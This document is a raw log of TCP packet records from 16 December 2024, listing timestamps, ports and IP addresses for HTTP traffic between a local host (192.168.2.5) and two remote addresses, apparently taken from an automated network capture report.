Dec 16, 2024 11:03:31.582509041 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.582545996 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.582566977 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.582592964 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.583508968 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.583564997 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.583786011 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.583936930 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.584583044 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.584635019 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.584718943 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.584765911 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.585696936 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.585767031 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.585819960 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.585864067 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.586811066 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.586855888 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.586914062 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.586956978 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.587867022 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.587990999 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.588037968 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.588922977 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.588978052 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.589044094 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.589267969 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.589999914 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.590053082 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.590189934 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.590425968 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.591093063 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.591239929 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.591289043 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.592192888 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.592242002 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.592308044 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.592364073 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.593405962 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.593461990 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.593516111 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.593934059 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.594336033 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.594382048 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.594463110 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.594506979 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.595511913 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.595629930 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.595674992 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.596488953 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.596533060 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.596615076 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.596657991 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.597588062 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.597645044 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.597709894 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.597759008 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.598707914 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.598759890 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.598824978 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.598882914 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.599776030 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.599833012 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.599898100 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.599994898 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.601039886 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.601089954 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.601099968 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.601134062 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.601953030 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.602005005 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.602060080 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:31.602102041 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:31.678395987 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:31.678518057 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:31.983244896 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.184254885 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.184330940 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.184331894 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.184371948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.184392929 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.184408903 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.184417009 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.184444904 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.184458017 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.184480906 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.184490919 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.184516907 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.184530973 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.184561968 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.184623957 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.184654951 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.184689999 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.184722900 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.184751987 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.184752941 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.184761047 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.184777021 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.184802055 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.184813976 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.184838057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.184853077 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.184895039 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.184927940 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.184931993 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.184958935 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.184962988 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.184971094 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.185096025 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.185100079 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.185147047 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.185244083 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.185278893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.185302019 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.185313940 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.185324907 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.185348988 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.185364008 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.185384035 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.185400009 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.185419083 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.185455084 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.185475111 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.185487032 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.185504913 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.185520887 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.185540915 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.185556889 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.185565948 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.185590982 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.185605049 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.185627937 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.185643911 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.185677052 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.186094046 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.186129093 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.186161041 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.186184883 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.186233997 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.186269045 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.186288118 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.186304092 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.186337948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.186338902 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.186362982 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.186372042 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.186399937 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.186408043 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.186422110 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.186443090 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.186451912 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.186479092 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.186499119 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.186513901 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.186528921 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.186551094 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.186572075 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.186587095 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.186604023 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.186630964 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.187148094 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.187182903 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.187197924 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.187213898 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.187215090 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.187241077 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.187251091 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.187258959 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.187275887 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.187285900 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.187293053 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.187304020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.187309027 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.187335968 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.187347889 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.187352896 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.187370062 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.187383890 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.187385082 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.187407017 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.187464952 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.187959909 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.187977076 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.187993050 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.188018084 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.188030005 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.188035011 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.188052893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.188077927 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.188080072 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.188097000 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.188112020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.188123941 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.188139915 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.188148022 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.188155890 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.188172102 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.188183069 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.188186884 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.188203096 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.188216925 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.188237906 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.188277960 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.188898087 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.188915968 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.188941002 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.188956022 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.188957930 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.188981056 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.188997984 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.189018965 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.189028025 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.189044952 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.189054966 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.189062119 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.189076900 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.189076900 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.189095020 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.189100027 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.189110994 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.189126968 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.189138889 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.189142942 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.189162970 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.189199924 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.189816952 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.189868927 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.189884901 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.189915895 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.189946890 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.190011024 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.190026999 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.190042019 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.190057993 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.190073013 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.190078974 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.190088987 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.190104961 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.190119028 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.190119982 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.190136909 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.190144062 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.190154076 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.190162897 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.190197945 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.190920115 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.190937996 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.190953016 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.190968990 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.190973043 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.190985918 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.190994978 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.191003084 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.191020012 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.191035986 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.191051006 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.191051006 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.191066027 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.191078901 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.191082954 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.191104889 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.191126108 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.191517115 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.191535950 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.191550016 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.191577911 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.191600084 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.191600084 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.191605091 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.191631079 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.191647053 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.191649914 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.191662073 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.191667080 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.191684008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.191710949 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.191715002 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.191734076 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.191745996 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.191751003 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.191768885 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.191791058 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.191823006 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.192397118 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.192454100 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.192588091 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.192605019 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.192620039 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.192635059 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.192646027 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.192651033 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.192667961 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.192672014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.192683935 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.192699909 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.192708015 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.192715883 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.192730904 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.192733049 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.192749977 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.192765951 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.192770004 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.192807913 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.193342924 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.193361044 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.193370104 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.193451881 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.193469048 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.193475008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.193484068 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.193499088 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.193516016 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.193532944 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.193538904 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.193548918 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.193564892 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.193572998 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.193578005 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.193583012 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.193593025 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.193605900 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.193633080 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.194262028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.194344044 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.194387913 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.194406033 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.194421053 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.194437027 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.194451094 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.194452047 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.194469929 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.194485903 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.194497108 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.194502115 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.194516897 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.194519043 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.194569111 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.195261002 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.195277929 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.195292950 CET	80	49833	31.41.244.11	192.168.2.5
